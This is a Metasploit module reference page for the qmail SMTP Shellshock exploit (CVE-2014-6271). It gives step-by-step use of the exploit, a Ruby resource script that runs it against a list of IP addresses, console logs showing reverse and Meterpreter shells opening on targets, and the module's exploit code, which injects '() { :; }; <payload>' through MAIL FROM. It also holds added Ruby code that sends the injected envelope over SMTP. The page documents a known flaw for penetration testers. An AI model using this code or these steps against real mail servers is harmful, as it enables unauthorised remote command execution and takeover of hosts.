Qmail SMTP Bash Environment Variable Injection (Shellshock) - Metasploit


This page contains detailed information about how to use the exploit/unix/smtp/qmail_bash_env_exec Metasploit module. For a list of all Metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Qmail SMTP Bash Environment Variable Injection (Shellshock)
Module: exploit/unix/smtp/qmail_bash_env_exec
Source code: modules/exploits/unix/smtp/qmail_bash_env_exec.rb
Disclosure date: 2014-09-24
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): cmd
Supported platform(s): Unix
Target service / protocol: smtp, smtps
Target network port(s): 25, 465, 587, 2525, 25000, 25025
List of CVEs: CVE-2014-6271

This module exploits Shellshock (CVE-2014-6271) through qmail, a public domain MTA written in C that runs on Unix systems. qmail-smtpd accepts the MAIL FROM address without validating its form, and qmail-local later hands that envelope sender to .qmail program deliveries in the SENDER environment variable while running those deliveries through /bin/sh. If /bin/sh is a vulnerable bash, a sender of the form "() { :; }; <command>" is imported as a function definition and the trailing command is executed. The flaw works on the latest qmail versions (qmail-1.03 and netqmail-1.06). However, in order to execute code, /bin/sh has to be linked to bash (usually the default configuration, although Debian-based systems ship dash as /bin/sh) and a valid recipient must be set in the RCPT TO field (usually [email protected]), since the sender only reaches a delivery shell when the message is actually delivered. The exploit does not work on the "qmailrocks" community version, as it ensures the MAIL FROM field is well-formed.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


Using qmail_bash_env_exec against a single host

Normally, you can use exploit/unix/smtp/qmail_bash_env_exec this way:

msf > use exploit/unix/smtp/qmail_bash_env_exec
msf exploit(qmail_bash_env_exec) > show targets
    ... a list of targets ...
msf exploit(qmail_bash_env_exec) > set TARGET target-id
msf exploit(qmail_bash_env_exec) > show options
    ... show and set options ...
msf exploit(qmail_bash_env_exec) > exploit

Using qmail_bash_env_exec against multiple hosts

Because this is a remote exploit module, you can also run it against multiple hosts.

First, create a list of IPs you wish to exploit with this module. One IP per line.

Second, set up a background payload listener. This payload should be the same as the one your qmail_bash_env_exec will be using:

  1. Do: use exploit/multi/handler
  2. Do: set PAYLOAD [payload]
  3. Set other options required by the payload
  4. Do: set EXITONSESSION false
  5. Do: run -j

At this point, you should have a payload listening.

Next, create the following script. Notice you will probably need to modify the ip_list path, and payload options accordingly:

<ruby>
#
# Modify the path if necessary
#
ip_list = '/tmp/ip_list.txt'

File.open(ip_list, 'rb').each_line do |line|
  ip = line.strip            # drop the trailing newline, or "set RHOST" receives it too
  next if ip.empty?          # skip blank lines in the list
  print_status("Trying against #{ip}")
  run_single("use exploit/unix/smtp/qmail_bash_env_exec")
  run_single("set RHOST #{ip}")
  run_single("set DisablePayloadHandler true")
  # MAILTO and RPORT keep the module defaults unless you set them here.

  #
  # Set a payload that's the same as the handler.
  # You might also need to add more run_single commands to configure other
  # payload options (LHOST, LPORT).
  #
  run_single("set PAYLOAD [payload name]")

  run_single("run")
end
</ruby>

Next, run the resource script in the console:

msf > resource [path-to-resource-script]

Finally, you should see the exploit being tried against each host in turn, as in the following MS08-067 example (the output below comes from a different module, but the flow of the resource script is the same):

msf > resource /tmp/exploit_hosts.rc
[*] Processing /tmp/exploit_hosts.rc for ERB directives.
[*] resource (/tmp/exploit_hosts.rc)> Ruby Code (402 bytes)
[*] Trying against 192.168.1.80

RHOST => 192.168.1.80
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199

[*] 192.168.1.80:445 - Automatically detecting the target...
[*] 192.168.1.80:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 192.168.1.80:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 192.168.1.80:445 - Attempting to trigger the vulnerability...
[*] Sending stage (957999 bytes) to 192.168.1.80
[*] Trying against 192.168.1.109
RHOST => 192.168.1.109
DisablePayloadHandler => true
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.199
[*] 192.168.1.109:445 - Automatically detecting the target...
[*] 192.168.1.109:445 - Fingerprint: Windows 2003 - Service Pack 2 - lang:Unknown
[*] 192.168.1.109:445 - We could not detect the language pack, defaulting to English
[*] 192.168.1.109:445 - Selected Target: Windows 2003 SP2 English (NX)
[*] 192.168.1.109:445 - Attempting to trigger the vulnerability...
[*] Meterpreter session 1 opened (192.168.1.199:4444 -> 192.168.1.80:1071) at 2016-03-02 19:32:49 -0600

[*] Sending stage (957999 bytes) to 192.168.1.109
[*] Meterpreter session 2 opened (192.168.1.199:4444 -> 192.168.1.109:4626) at 2016-03-02 19:32:52 -0600

Required Options


  • RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

Knowledge Base


Vulnerable Application


Any qmail version running on a system with a Shellshock-vulnerable bash; the module has been verified against the latest releases, qmail-1.03 and netqmail-1.06. In order to execute code, /bin/sh has to be linked to bash (usually the default configuration, although Debian-based systems ship dash as /bin/sh) and a valid recipient must be set in the RCPT TO field (usually [email protected]). The exploit does not work on the "qmailrocks" community version, as it ensures the MAIL FROM field is well-formed.

Setting up a vulnerable environment


Install qmail on a Linux server with a Shellshock-vulnerable bash. Ensure that /bin/sh is linked to bash (on Debian-based systems it points to dash by default and has to be relinked). Create an e-mail account on that qmail server. IMPORTANT: there is a community version of qmail, "qmailrocks" (http://qmailrocks.thibs.com/), which applies a patch that validates the vulnerable MAIL FROM parameter. This version (with the patch applied) is NOT vulnerable. If you are using it, change the "int mfcheck()" function in qmail-smtpd.c so that it always returns 0 (after applying the patch) and recompile qmail-smtpd.
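Before pointing the module at a lab box, confirm the two preconditions this section names. The Ruby below is an added example, not code from the page or the Metasploit module, and is meant to run on the qmail host itself. The probe is the standard CVE-2014-6271 environment-variable test; the function names (shellshock_vulnerable?, sh_resolves_to_bash?, exploit_preconditions) and the SHELLSHOCK_PROBE variable name are this example's own.

```ruby
# Added example (not from the page or the Metasploit module): checks to run
# on the qmail host for the two preconditions the exploit needs.
# Function names and the SHELLSHOCK_PROBE variable are this example's own.

# 1. CVE-2014-6271 probe: export a function definition through the
#    environment and see whether bash runs the command that follows it
#    while importing the variable. A patched bash prints only "probe-done";
#    an unpatched one also prints the marker. nil means no such binary.
def shellshock_vulnerable?(bash = 'bash')
  marker = 'SHELLSHOCK_MARKER'
  env    = { 'SHELLSHOCK_PROBE' => "() { :; }; echo #{marker}" }
  output = IO.popen(env, [bash, '-c', 'echo probe-done'], err: [:child, :out], &:read)
  output.include?(marker)
rescue Errno::ENOENT
  nil
end

# 2. qmail-local runs .qmail program deliveries through /bin/sh, so the
#    SENDER variable only reaches a vulnerable parser if /bin/sh is bash
#    (Debian-based systems link it to dash by default).
def sh_resolves_to_bash?(sh = '/bin/sh')
  File.basename(File.realpath(sh)) == 'bash'
rescue Errno::ENOENT
  false
end

# Both conditions together; :exploitable is true only when both hold.
def exploit_preconditions(bash: 'bash', sh: '/bin/sh')
  sh_is_bash = sh_resolves_to_bash?(sh)
  bash_vuln  = shellshock_vulnerable?(bash)
  { sh_is_bash: sh_is_bash, bash_vulnerable: bash_vuln,
    exploitable: sh_is_bash && bash_vuln == true }
end

puts exploit_preconditions.inspect if __FILE__ == $PROGRAM_NAME
```

Run it as the user qmail-local delivers under (vpopmail in the scenario below), since that user's PATH decides which bash the probe finds; sh_is_bash being false on a Debian-based host means /bin/sh has to be relinked before the exploit can work at all.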

Verification Steps


  1. use exploit/unix/smtp/qmail_bash_env_exec
  2. set RHOST <target IP>
  3. set MAILTO <valid e-mail recipient>
  4. set payload cmd/unix/reverse
  5. set LHOST <local IP>
  6. optionally set RPORT and LPORT
  7. exploit
  8. Verify a new shell session is started

Options


MAILTO

A valid e-mail recipient. Usually, [email protected] can be used.

Scenarios


Tested on qmail-1.03 on Debian 6.0.6 (squeeze). BASH version 4.1.5(1).

msf > use exploit/unix/smtp/qmail_bash_env_exec 
msf exploit(qmail_bash_env_exec) > set rhost 192.168.1.113
rhost => 192.168.1.113
msf exploit(qmail_bash_env_exec) > set mailto "[email protected]"
mailto => [email protected]
msf exploit(qmail_bash_env_exec) > set payload cmd/unix/reverse
payload => cmd/unix/reverse
msf exploit(qmail_bash_env_exec) > show options 

Module options (exploit/unix/smtp/qmail_bash_env_exec):

   Name    Current Setting        Required  Description
   ----    ---------------        --------  -----------
   MAILTO  [email protected]  yes       TO address of the e-mail
   RHOST   192.168.1.113          yes       The target address
   RPORT   25                     yes       The target port (TCP)


Payload options (cmd/unix/reverse):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.1.102    yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf exploit(qmail_bash_env_exec) > run

[*] Started reverse TCP double handler on 192.168.1.102:4444 
[*] 192.168.1.113:25 - Sending the payload...
[*] 192.168.1.113:25 - Sending RCPT TO [email protected]
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo RvZfov9i2ZuveLXA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "RvZfov9i2ZuveLXA\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 19 opened (192.168.1.102:4444 -> 192.168.1.113:48167) at 2017-05-04 15:11:02 +0200

whoami
vpopmail


Msfconsole Usage


Here is how the unix/smtp/qmail_bash_env_exec exploit module looks in the msfconsole:

msf6 > use exploit/unix/smtp/qmail_bash_env_exec

msf6 exploit(unix/smtp/qmail_bash_env_exec) > show info

       Name: Qmail SMTP Bash Environment Variable Injection (Shellshock)
     Module: exploit/unix/smtp/qmail_bash_env_exec
   Platform: Unix
       Arch: cmd
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2014-09-24

Provided by:
  Mario Ledo (Metasploit module)
  Gabriel Follon (Metasploit module)
  Kyle George (Vulnerability discovery)

Available targets:
  Id  Name
  --  ----
  0   Automatic

Check supported:
  No

Basic options:
  Name    Current Setting     Required  Description
  ----    ---------------     --------  -----------
  MAILTO  [email protected]  yes       TO address of the e-mail
  RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
  RPORT   25                  yes       The target port (TCP)

Payload information:
  Space: 888
  Avoid: 1 characters

Description:
  This module exploits a shellshock vulnerability on Qmail, a public 
  domain MTA written in C that runs on Unix systems. Due to the lack 
  of validation on the MAIL FROM field, it is possible to execute 
  shell code on a system with a vulnerable BASH (Shellshock). This 
  flaw works on the latest Qmail versions (qmail-1.03 and 
  netqmail-1.06). However, in order to execute code, /bin/sh has to be 
  linked to bash (usually default configuration) and a valid recipient 
  must be set on the RCPT TO field (usually [email protected]). 
  The exploit does not work on the "qmailrocks" community version as 
  it ensures the MAILFROM field is well-formed.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2014-6271
  https://cwe.mitre.org/data/definitions/94.html
  OSVDB (112004)
  https://www.exploit-db.com/exploits/34765
  https://seclists.org/oss-sec/2014/q3/649
  https://lists.gt.net/qmail/users/138578

Module Options


This is a complete list of options available in the unix/smtp/qmail_bash_env_exec exploit:

msf6 exploit(unix/smtp/qmail_bash_env_exec) > show options

Module options (exploit/unix/smtp/qmail_bash_env_exec):

   Name    Current Setting     Required  Description
   ----    ---------------     --------  -----------
   MAILTO  [email protected]  yes       TO address of the e-mail
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT   25                  yes       The target port (TCP)

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options


Here is a complete list of advanced options supported by the unix/smtp/qmail_bash_env_exec exploit:

msf6 exploit(unix/smtp/qmail_bash_env_exec) > show advanced

Module advanced options (exploit/unix/smtp/qmail_bash_env_exec):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   CHOST                                    no        The local client address
   CPORT                                    no        The local client port
   ConnectTimeout          10               yes       Maximum number of seconds to establish a TCP connection
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   SSL                     false            no        Negotiate SSL/TLS for outgoing connections
   SSLCipher                                no        String for SSL cipher - "DHE-RSA-AES256-SHA" or "ADH"
   SSLVerifyMode           PEER             no        SSL verification method (Accepted: CLIENT_ONCE, FAIL_IF_NO_PEER_CERT, NONE, PEER)
   SSLVersion              Auto             yes       Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session

Exploit Targets


Here is a list of targets (platforms and systems) which the unix/smtp/qmail_bash_env_exec module can exploit:

msf6 exploit(unix/smtp/qmail_bash_env_exec) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the unix/smtp/qmail_bash_env_exec exploit:

msf6 exploit(unix/smtp/qmail_bash_env_exec) > show payloads

Compatible Payloads
===================

   #   Name                                        Disclosure Date  Rank    Check  Description
   -   ----                                        ---------------  ----    -----  -----------
   0   payload/cmd/unix/bind_perl                                   normal  No     Unix Command Shell, Bind TCP (via Perl)
   1   payload/cmd/unix/bind_perl_ipv6                              normal  No     Unix Command Shell, Bind TCP (via perl) IPv6
   2   payload/cmd/unix/bind_ruby                                   normal  No     Unix Command Shell, Bind TCP (via Ruby)
   3   payload/cmd/unix/bind_ruby_ipv6                              normal  No     Unix Command Shell, Bind TCP (via Ruby) IPv6
   4   payload/cmd/unix/generic                                     normal  No     Unix Command, Generic Command Execution
   5   payload/cmd/unix/reverse                                     normal  No     Unix Command Shell, Double Reverse TCP (telnet)
   6   payload/cmd/unix/reverse_bash_telnet_ssl                     normal  No     Unix Command Shell, Reverse TCP SSL (telnet)
   7   payload/cmd/unix/reverse_perl                                normal  No     Unix Command Shell, Reverse TCP (via Perl)
   8   payload/cmd/unix/reverse_perl_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via perl)
   9   payload/cmd/unix/reverse_python                              normal  No     Unix Command Shell, Reverse TCP (via Python)
   10  payload/cmd/unix/reverse_python_ssl                          normal  No     Unix Command Shell, Reverse TCP SSL (via python)
   11  payload/cmd/unix/reverse_ruby                                normal  No     Unix Command Shell, Reverse TCP (via Ruby)
   12  payload/cmd/unix/reverse_ruby_ssl                            normal  No     Unix Command Shell, Reverse TCP SSL (via Ruby)
   13  payload/cmd/unix/reverse_ssl_double_telnet                   normal  No     Unix Command Shell, Double Reverse TCP SSL (telnet)

Evasion Options


Here is the full list of possible evasion options supported by the unix/smtp/qmail_bash_env_exec exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(unix/smtp/qmail_bash_env_exec) > show evasion

Module evasion options:

   Name                Current Setting  Required  Description
   ----                ---------------  --------  -----------
   TCP::max_send_size  0                no        Maximum tcp segment size.  (0 = disable)
   TCP::send_delay     0                no        Delays inserted before every send.  (0 = disable)


Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

<RHOST>:<RPORT> Error smtp_send: '<E.CLASS>' '<E>'


Printed by the module's smtp_send helper when sending a command or reading its reply raises anything other than a connection error, a connection reset or EOF. Those three are swallowed and reported to the caller as reply code 0; any other exception is printed with its class and message and also reported as code 0, so the exploit method then fails with "connection error":

      code = result[0..2].to_i if result
      return result, code
    rescue Rex::ConnectionError, Errno::ECONNRESET, ::EOFError
      return result, 0
    rescue ::Exception => e
      print_error("#{rhost}:#{rport} Error smtp_send: '#{e.class}' '#{e}'")
      return nil, 0
    end
  end

connection error


Raised by fail_with at every step of the exploit method (HELO, MAIL FROM, RCPT TO, DATA, message body) when smtp_send reported code 0, i.e. the connection dropped or the send failed. If the server did answer, but with a code outside the accepted range (200-300, or 200-354 for the DATA command, which is expected to return 354), the module reports the server's own reply line instead of "connection error"; a rejection of RCPT TO (qmail's "553 sorry, that domain isn't in my list of allowed rcpthosts", for instance) means MAILTO is not a recipient this server accepts:

  def exploit
    to = datastore['MAILTO']
    connect
    result = smtp_send("HELO localhost\r\n")
    if result[1] < 200 || result[1] > 300
      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
    end
    print_status('Sending the payload...')
    result = smtp_send("mail from:<() { :; }; " + payload.encoded.gsub!(/\\/, '\\\\\\\\') + ">\r\n")
    if result[1] < 200 || result[1] > 300
      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
    end
    print_status("Sending RCPT TO #{to}")
    result = smtp_send("rcpt to:<#{to}>\r\n")
    if result[1] < 200 || result[1] > 300
      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
    end
    result = smtp_send("data\r\n")
    if result[1] < 200 || result[1] > 354
      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
    end
    result = smtp_send("data\r\n\r\nfoo\r\n\r\n.\r\n")
    if result[1] < 200 || result[1] > 300
      fail_with(Failure::Unknown, (result[1] != 0 ? result[0] : 'connection error'))
    end
    disconnect
  end
end
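The exploit method above boils down to one SMTP conversation, and the description's point that qmail does not validate MAIL FROM is what lets the bash function definition ride in the envelope sender. The Ruby below is an added example, not code from the page or the Metasploit module: it replays that conversation against a constructed in-process stand-in for qmail-smtpd on loopback (so it runs offline and records what envelope sender the server was handed), then repeats it against a stand-in that validates MAIL FROM, as the page says the qmailrocks patch does, to show which branch of the module's reply checks a hardened server triggers. The function names, the mock's reply strings and the validation rule are this example's own assumptions; a real qmail-smtpd's replies differ.

```ruby
require 'socket'

# Sender validation in the spirit of the qmailrocks mfcheck the page mentions
# (an illustration, not that patch's code): accept the null sender used by
# bounces, or local@domain from a conservative character set. The Shellshock
# trigger "() { :; }; ..." contains spaces, braces and ';' and is rejected.
def envelope_sender_ok?(sender)
  return true if sender.empty?
  sender.match?(/\A[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+\z/)
end

# Constructed qmail-smtpd stand-in: just enough SMTP for the exploit's command
# sequence. Records the envelope sender it was handed in state[:sender];
# with strict: true it rejects malformed senders with a 553.
def start_mock_smtpd(strict: false)
  server = TCPServer.new('127.0.0.1', 0)
  state  = { port: server.addr[1], sender: nil }
  Thread.new do
    client  = server.accept
    in_data = false
    client.write("220 mock.example.com ESMTP\r\n")
    while (line = client.gets)
      line = line.chomp
      if in_data # message body, terminated by a line holding only "."
        if line == '.'
          in_data = false
          client.write("250 ok queued\r\n")
        end
        next
      end
      case line
      when /\Ahelo\b/i then client.write("250 mock.example.com\r\n")
      when /\Amail from:<(.*)>\z/i
        state[:sender] = Regexp.last_match(1)
        if strict && !envelope_sender_ok?(state[:sender])
          client.write("553 sorry, malformed envelope sender (#5.7.1)\r\n")
        else
          client.write("250 ok\r\n")
        end
      when /\Arcpt to:/i then client.write("250 ok\r\n")
      when /\Adata\z/i
        in_data = true
        client.write("354 go ahead\r\n")
      when /\Aquit\z/i
        client.write("221 bye\r\n")
        break
      else client.write("502 unimplemented (#5.5.1)\r\n")
      end
    end
    client.close
    server.close
  end
  state
end

# Client side, mirroring the module: HELO, MAIL FROM carrying the function
# definition plus command, RCPT TO the valid recipient, DATA, a throwaway
# body. Each reply is checked against the range the module accepts; the first
# rejected step is returned as [stage, code, reply], else [:done, 250, nil].
def send_shellshock_envelope(host, port, mailto, command)
  # The module doubles backslashes in the payload; the block form keeps gsub
  # from interpreting the replacement string.
  escaped = command.gsub('\\') { '\\\\' }
  steps = [
    [:helo,      "HELO localhost\r\n",                    200..300],
    [:mail_from, "mail from:<() { :; }; #{escaped}>\r\n", 200..300],
    [:rcpt_to,   "rcpt to:<#{mailto}>\r\n",               200..300],
    [:data,      "data\r\n",                              200..354],
    [:body,      "data\r\n\r\nfoo\r\n\r\n.\r\n",          200..300],
  ]
  sock = TCPSocket.new(host, port)
  sock.gets # 220 greeting
  steps.each do |stage, wire, accepted|
    sock.write(wire)
    reply = sock.gets.to_s.chomp # nil reply (dropped connection) becomes code 0
    code  = reply[0..2].to_i
    unless accepted.cover?(code)
      sock.close
      return [stage, code, reply]
    end
  end
  sock.write("quit\r\n")
  sock.close
  [:done, 250, nil]
end

if __FILE__ == $PROGRAM_NAME
  lax = start_mock_smtpd
  p send_shellshock_envelope('127.0.0.1', lax[:port], 'postmaster@example.com', '/bin/sleep 5')
  p lax[:sender]
  strict = start_mock_smtpd(strict: true)
  p send_shellshock_envelope('127.0.0.1', strict[:port], 'postmaster@example.com', '/bin/sleep 5')
end
```

Against the permissive stand-in every step is accepted and the recorded sender is the full "() { :; }; /bin/sleep 5" string, which is exactly what a real qmail-local would export as SENDER; against the validating one the client stops at MAIL FROM with the 553, the case in which the module prints the server's reply rather than "connection error".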

Authors


  • Mario Ledo (Metasploit module)
  • Gabriel Follon (Metasploit module)
  • Kyle George (Vulnerability discovery)

Version


This page has been produced using Metasploit Framework version 6.1.29-dev. For more modules, visit the Metasploit Module Library.
